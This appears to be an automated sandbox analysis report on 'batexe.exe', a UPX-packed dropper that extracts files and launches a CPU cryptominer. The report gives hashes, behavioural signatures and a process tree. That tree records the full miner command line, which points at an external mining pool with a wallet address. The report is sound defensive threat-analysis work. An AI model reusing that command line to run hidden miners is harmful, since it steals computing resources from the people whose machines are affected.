73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
302s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 15:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3880	b2e.exe
3364	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3364	cpuminer-sse2.exe
3364	cpuminer-sse2.exe
3364	cpuminer-sse2.exe
3364	cpuminer-sse2.exe
3364	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/780-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 780 wrote to memory of 3880	780	batexe.exe	74
PID 780 wrote to memory of 3880	780	batexe.exe	74
PID 780 wrote to memory of 3880	780	batexe.exe	74
PID 3880 wrote to memory of 208	3880	b2e.exe	75
PID 3880 wrote to memory of 208	3880	b2e.exe	75
PID 3880 wrote to memory of 208	3880	b2e.exe	75
PID 208 wrote to memory of 3364	208	cmd.exe	78
PID 208 wrote to memory of 3364	208	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:780
- C:\Users\Admin\AppData\Local\Temp\19AD.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\19AD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\19AD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1F5A.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\19AD.tmp\b2e.exe

Filesize
3.0MB

MD5
9845da021ae8e1200f14f500358f2d2f

SHA1
8d6de1ca4879a80c03ffeb72fd86912fdcae7cf0

SHA256
9df1e86f8a5ff2c7fb143092fc32f521b60e01816cb1785336cb208ca91bf33f

SHA512
f3d5dee79a0f8ba2cfb7e366dea744e42a96c07a7f3bc091a4a5392f93095c383432bbd2bb63a934377ce7be92150e305fefcbd3b0ed26d2ab32e2fccf467162

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.tmp\b2e.exe

Filesize
1.9MB

MD5
8d7741d935387917b9b6395a55971d72

SHA1
7d83faddba1d9ae5f6902e23c119ebdda61ba8bf

SHA256
db659806dbecf53b399a79387895867f8d57d730af5255ec7bf92184b5311db6

SHA512
3e6c266858fff7760989b767eef53a348acbb29e7f73b3607479ae41e9e41f6bc7bb8c33ef181134964bd2fe9f84815ffd455d9f22731925c1547ee057ac44fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1F5A.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
183KB

MD5
af367194e4b28950076cefe8b46c9605

SHA1
94aaa2f7d2bf9d0e4aaba89d6bf780cd641268c5

SHA256
70bcebcb5e90d6df1f31c30e75b971e060863c4763994154f02584868711e827

SHA512
6b765691f39864161ef47bc93ccad4614d48819141b8b60703d513b6fd4a3684e9b1907a001d853c61c0562925d3d21b63d8ad67eda6c0819365fddfc7458b00

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
117KB

MD5
ad3625cf2757309963a130071bdabeed

SHA1
17b1b48ed7d449dde9d301aa9e3f9472dee56580

SHA256
deaec9fe54b8cd86a0b2db41dfdfffb200b68f51ca5fed304cba9f43b7fa1df8

SHA512
605c8b3599503ec11bb43035d4bd62e308c14fa35550106530d67fb4a9f4d73bcaa94149cfc168f51490f41ee968ad8dc495b2e3e25f58634ce8d8a3fa132dcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
185KB

MD5
1225ba8514f9abe4f4b54fc7c099bf4d

SHA1
9be8609d62e92ccec9a1db908ab1c684bcee756f

SHA256
0fa5d2890f59f3c4fe3fd1cdbdbe8071c8c39b49c0c6b288c98c382d76cc9cd6

SHA512
e562c000e5b0811122e7c4ac1858552763fa96f62ac2febbcd087d4b9528e82e1c4744203489cd1be3cfae37f2d68c34f345a01cd4f6694fbd61de7cd5863d00

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
201KB

MD5
19cf98270341f4b9020e257658443b84

SHA1
95a596ea5aafd26214f9631d2bbdc2bb89fd6534

SHA256
eeed2edd2fc8a4e3a5ddca9f7e29fda25ada9e4d642c1870c3ccb5444d9c6d74

SHA512
dbf6f7eb9a94e20814ded4cee5da41b0f18b839c8d050189999e6943747793f149b1a8622b430ac0ec4f4f406b42b273c8f89aff205bb852202b7f91bf7707e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
181KB

MD5
848703c930764ecf61738d28491a1a96

SHA1
8b86bad46e4859967877c06987c3b0eabd492342

SHA256
3b1846f037ffc63fed53dd02a624e11658a1c99649e4f71e90b43c8280b82f44

SHA512
6d291ef9be47c088ddbb865b3c1a116a0db2adfa61d5648d94e7a44ace634385c0a8256d6b1f2e8b90daa09a4c50e6fcea4ba70033b7130e76b07227a80d976b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
158KB

MD5
9e35dd710f28bfd3915705be92c2f7f4

SHA1
5a371743a6b9e1526aad304665ab3e9421136f71

SHA256
e6ea980225394146fd2c6ac84598b316051ecaf44c8e08cd554cd73339e10128

SHA512
b6d5ba3de13603e68c2874fb51941f7822d88ca4cfc38f89ebd15bdee8c4b812983bd991c40ffdb8570d06a6a0d624c3a11c992240b8eb451cfdbc846e9c7557

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
192KB

MD5
8c933a591c8d0c1fec1da393587d09c9

SHA1
65f4672c0e0a6a20436fbaba57dac8c1a5fc5e51

SHA256
c22ca427c0e65a0bb3e011afeba5244dd5a6e9c0327cfc7d15c4875083206b10

SHA512
96b84267fd9b7c5587c74e30d5f647acabbf6b09feac19784de4e046619fcae78f2e6aa98eb7f06fe13197bfd9207b9044b09d5248480421ceb23cb01d511881

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
229KB

MD5
11f4899d09c2f637cdb9ab349c8409a2

SHA1
fbe43c83f0b4ea9eb599072d7d401c89054c0e54

SHA256
cfd4ec8d69aa489fcb2dd50eb9b09389b72380f84b66fbdd0ca3dac572d2b185

SHA512
5b57db1ffb760d19f3cd8e16b17725e6d2c6cb867664a1ba2985efa1400ebc39570dceae2daf13459c6dd6863f8e4d12129e8bfbd49a39a8eedd719242df0a82

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
273KB

MD5
53cc4018c5adac11ca1275603f84b85d

SHA1
764b69c48d8a1665ebb86934fd415a075486421a

SHA256
923d86a645e4d937722c2b74dd15506ecbd7548d52f0f65485f5802aed9f4a2e

SHA512
adee8b5b4b86cc669723e08d608935a5f8fa92a105a6ab4aa5f6fda16d2f8a247c0738f6bec595f4aa5a83a51d592a39bf3d2fb1c35844e68d3f83b2df3734f4

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
97KB

MD5
2f3b9dce20b82a945c14e97eae50e326

SHA1
7c7d771a6d35c452b1d336a163e0a1a910bb732e

SHA256
2ffb49a10678e1396e1901f3bd5baf4ba67c1ef528d533c58e4b2219e361abef

SHA512
7393db4676b1843b186abc0aea56f39611b9849cf4e4651231dc04b3be391650c92fa899cd8c2ab99e0c69a722d1519a7355ee302f78722b7a30226a631abd19

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
263KB

MD5
861431ade62c08e0b13deea36ab43651

SHA1
6639fa502cc4947578fb1e0981430dfd27bcb808

SHA256
b931d0c1ca6bb190fcbcc4d2cdf4d912c59b62e6c9b91ad03826b9b0ce53ce97

SHA512
9f6b98af492ae160a2d22ccc518074566bde40062da4b48ee0088fb877155dfe2b842624bc5ffb935837cd12dc3419ad00e57472c7a56fcf8c099500ebb87530

Download Submit
memory/780-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3364-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3364-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3364-43-0x000000006E300000-0x000000006E398000-memory.dmp

Filesize
608KB

Download
memory/3364-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/3364-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3364-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3880-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3880-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download